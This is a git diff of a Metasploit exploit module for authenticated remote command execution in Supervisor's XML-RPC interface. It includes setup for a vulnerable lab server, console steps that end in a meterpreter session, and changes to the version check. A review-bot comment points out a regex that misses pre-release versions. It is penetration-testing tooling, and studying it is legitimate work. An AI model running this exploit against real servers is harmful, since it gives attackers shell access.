cleaned up version, and docs
parent
3b745bd17c
commit
9528f279a5
|
@ -4,25 +4,51 @@
|
|||
|
||||
This has been tested with versions 3.2.0 and 3.3.2
|
||||
|
||||
### Creating A Testing Environment
|
||||
|
||||
At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories.
|
||||
|
||||
1. ```sudo apt-get install supervisor```
|
||||
2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf`
|
||||
|
||||
```
|
||||
[inet_http_server] ; inet (TCP) server disabled by default
|
||||
port=:9001 ; ip_address:port specifier, *:port for all iface
|
||||
username=user ; default is no username (open server)
|
||||
password=123 ; default is no password (open server)
|
||||
```
|
||||
|
||||
3. Restart the service: `sudo service supervisor restart`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. ```msf > use exploit/linux/http/supervisor_xmlrpc_exec```
|
||||
2. ```msf > set lhost 192.168.0.2```
|
||||
3. ```msf > set rhost 192.168.0.19```
|
||||
4. ```msf > set httpusername user``` (optional)
|
||||
5. ```msf > set httppassword 123``` (optional)
|
||||
6. ```msf > exploit```
|
||||
1. ```use exploit/linux/http/supervisor_xmlrpc_exec```
|
||||
2. ```set lhost [IP]```
|
||||
3. ```set rhost [IP]```
|
||||
4. ```set httpusername user```
|
||||
5. ```set httppassword 123```
|
||||
6. ```exploit```
|
||||
7. A meterpreter session should have been opened successfully
|
||||
|
||||
## Options
|
||||
|
||||
- `HttpUsername` - Username for HTTP basic auth (optional)
|
||||
- `HttpPassword` - Password for HTTP basic auth (optional)
|
||||
- `TARGETURI` - The path to the XML-RPC endpoint
|
||||
**HttpUsername**
|
||||
|
||||
Username for HTTP basic auth which is set in the conf file(optional)
|
||||
|
||||
**HttpPassword**
|
||||
|
||||
Password for HTTP basic auth which is set in the conf file(optional)
|
||||
|
||||
**TARGETURI**
|
||||
|
||||
The path to the XML-RPC endpoint
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
### Supervisor 3.2.0 on Xubuntu 16.04
|
||||
|
||||
```
|
||||
msf > use exploit/linux/http/supervisor_xmlrpc_exec
|
||||
msf exploit(supervisor_xmlrpc_exec) > set httpusername user
|
||||
httpusername => user
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
|
@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
This module exploits a vulnerability in the Supervisor process control software, where an authenticated client
|
||||
can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.
|
||||
The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this
|
||||
may be root. This vulnerability can only be exploited by an authenticated client or if supervisord has been
|
||||
may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been
|
||||
configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -59,12 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
)
|
||||
end
|
||||
|
||||
def check_version(version_match)
|
||||
maj = version_match[2]
|
||||
min = version_match[3]
|
||||
patch = version_match[5]
|
||||
|
||||
if maj.to_i == 3 and (patch.nil? or patch.to_i < 3)
|
||||
def check_version(version)
|
||||
if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1')
|
||||
return true
|
||||
else
|
||||
return false
|
||||
|
@ -73,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def check
|
||||
|
||||
print_status("Extracting version from web interface..")
|
||||
print_status('Extracting version from web interface..')
|
||||
|
||||
params = {
|
||||
'method' => 'GET',
|
||||
|
@ -87,17 +83,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
if res
|
||||
if res.code == 200
|
||||
match = res.body.match(/<span>((\d+)\.([\dab]+)(\.(\d+))?)<\/span>/)
|
||||
match = res.body.match(/<span>(\d+\.[\dab]\.\d+)<\/span>/)
|
||||
if match
|
||||
if check_version(match)
|
||||
print_good("Vulnerable version found: #{match[1]}")
|
||||
version = Gem::Version.new(match[1])
|
||||
if check_version(version)
|
||||
print_good("Vulnerable version found: #{version}")
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
print_bad("Version #{match[1]} is not vulnerable")
|
||||
print_bad("Version #{version} is not vulnerable")
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
else
|
||||
print_bad("Could not extract version number from web interface")
|
||||
print_bad('Could not extract version number from web interface')
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
elsif res.code == 401
|
||||
|
@ -108,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
else
|
||||
print_bad("Error connecting to web interface")
|
||||
print_bad('Error connecting to web interface')
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
|
@ -163,7 +160,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response")
|
||||
end
|
||||
else
|
||||
print_good("Request returned without status code, usually indicates success. Passing to handler..")
|
||||
print_good('Request returned without status code, usually indicates success. Passing to handler..')
|
||||
handler
|
||||
end
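Review bot: The tightened version regex on the new side of the hunk at `@ -87,17 +83,18` (`/<span>(\d+\.[\dab]\.\d+)<\/span>/`) cannot match the pre-release versions that `check_version` treats as vulnerable from 3.0a1 upward, nor a minor component of two or more digits, so a web interface reporting `3.0a1` or `3.0b1` would fall into the `Could not extract version number` branch and `check` would return Unknown, whereas the old pattern's `([\dab]+)(\.(\d+))?` accepted both. A pattern such as `match = res.body.match(%r{<span>(\d+\.\d+(?:[ab]\d+)?(?:\.\d+)?)</span>})` covers the advertised range while still restricting the captured text to digits, dots and a/b, which matters because `Gem::Version.new` on the following line raises ArgumentError on a malformed string taken from the server-controlled response body. The enclosing `check` method begins in the preceding hunk and continues past this one. Separately, the new `check_version` in the hunk at `@ -59,12 +59,8` uses `and` for boolean logic, which RuboCop flags for its precedence; `version.between?(Gem::Version.new('3.0a1'), Gem::Version.new('3.3.2'))` expresses the same range test and removes the need for the explicit `return true`/`return false` branches (that method's closing `end` lies outside the hunk).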
|
||||
|
||||
|
|